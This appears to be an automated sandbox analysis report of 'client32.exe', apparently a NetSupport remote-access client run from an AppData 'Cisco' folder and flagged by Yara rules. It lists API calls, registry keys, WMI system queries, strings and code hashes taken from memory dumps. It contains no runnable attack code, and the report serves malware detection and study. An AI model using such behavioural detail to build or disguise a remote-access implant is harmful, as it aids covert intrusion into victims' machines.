                                                                                                                                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                                                    • API String ID: 3472027048-3774545468
                                                                                                                                                                                                    • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 886e61ee1db4a73107c1d7a95bd82af5a672a5ba6fc9625f73b8cf63a801b066
                                                                                                                                                                                                    • Instruction ID: 63e1efd3676a9638e3e81043c3dc0052e760c462e139dfc9f2a387f827b805c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 886e61ee1db4a73107c1d7a95bd82af5a672a5ba6fc9625f73b8cf63a801b066
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA12F478A043969FDB12CF64C9807AEFFF0AF07318F144A99E5618B391D7B1A950CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion
                                                                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                                    • API String ID: 925726728-545709139
                                                                                                                                                                                                    • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                                                                                    • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110152AA
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                                                                                                    • NSLSP, xrefs: 11015338
                                                                                                                                                                                                    • PackedCatalogItem, xrefs: 11015312
                                                                                                                                                                                                    • %012d, xrefs: 110152A4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValuewsprintf
                                                                                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                                                    • API String ID: 2072284396-1346142259
                                                                                                                                                                                                    • Opcode ID: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction ID: 40dd4717f0c7ad5754e433c7b85868c8d74bcde588045e86a78ebe46af68b9ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13c1aca20664a4fc0e133d793f1d669f9232a02ffdca666f732179c289691334
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01418F75D022299EEB11DF50CC94BEEF7B4EB45318F0445E8E91AA7281EB34AB44CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • DoICFConfig() OK, xrefs: 11135C96
                                                                                                                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
                                                                                                                                                                                                    • Client, xrefs: 11135C15
                                                                                                                                                                                                    • AutoICFConfig, xrefs: 11135C10
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick
                                                                                                                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                                                                    • API String ID: 536389180-1512301160
                                                                                                                                                                                                    • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                                                    • API String ID: 4186647306-532032230
                                                                                                                                                                                                    • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,689D0F2B,05C2A5B0,00000000,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?,00000080), ref: 689D0D48
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 689D0D5B
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?), ref: 689D0D9F
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-689FCB4C,?,?,689EF278,000000FF,?,689BAE0A,?,00000000,?,00000080), ref: 689D0D76
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                      • Part of subcall function 689D1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersAddressesHeap$AddressAllocateErrorFreeLastLibraryLoadProc
                                                                                                                                                                                                    • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                                                                    • API String ID: 2394954111-1843585929
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,771CC310,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s%s%s.bin$141700$_HF$_HW$_SW
                                                                                                                                                                                                    • API String ID: 2111968516-4139989726
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6950
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,689BDA7F,?,00000000), ref: 689BA503
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 689BA568
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: Sleep.KERNEL32(00000000,?,689BDA7F,?,00000000), ref: 689BA581
                                                                                                                                                                                                      • Part of subcall function 689BA4E0: LeaveCriticalSection.KERNEL32(689FB898,00000000), ref: 689BA5B3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick
                                                                                                                                                                                                    • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                                                                                    • API String ID: 1409162668-1140593649
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11061908
                                                                                                                                                                                                    • CheckLicenseString.PCICHEK(00000000,00000000), ref: 1106191B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106193F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CheckCountLicenseStringTickwsprintf
                                                                                                                                                                                                    • String ID: _License
                                                                                                                                                                                                    • API String ID: 1965704701-3969723640
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                                                    • String ID: NSMDesktopWnd
                                                                                                                                                                                                    • API String ID: 2669163067-206650970
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00007F6E,TermUI...), ref: 111393C3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(75CF0000,?,TermUI...), ref: 1113943B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                                                                                                                    • String ID: TermUI
                                                                                                                                                                                                    • API String ID: 2006562601-4085834059
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                                                                                    • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume
                                                                                                                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                                                    • API String ID: 1311402438-1858614750
                                                                                                                                                                                                    • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 1101755C
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                                                    • API String ID: 2994556011-578995875
                                                                                                                                                                                                    • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                      • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000244), ref: 111408D9
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000244), ref: 111408EF
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                                                    • String ID: MiniDump
                                                                                                                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                                                                                                                    • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 11017472
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                                                    • API String ID: 2994556011-2037925671
                                                                                                                                                                                                    • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1110CA5A
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,1106FB37,?), ref: 1110CA69
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1110CADC
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: InitializeCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: EnterCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$p.second
                                                                                                                                                                                                    • API String ID: 2150084884-3525309832
                                                                                                                                                                                                    • Opcode ID: d2f61b0eaed3a002ea92b2e2cc559baee22e6144732f1e003b593fdd17784218
                                                                                                                                                                                                    • Instruction ID: 1b36d3df48c3b94c68758170c6cf325b701265bc9f740d34816683db193cdaff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2f61b0eaed3a002ea92b2e2cc559baee22e6144732f1e003b593fdd17784218
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 172162B6D00619AFC711CF95D885BEFF7B8FB08204F00462AE516A3640EB347505CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
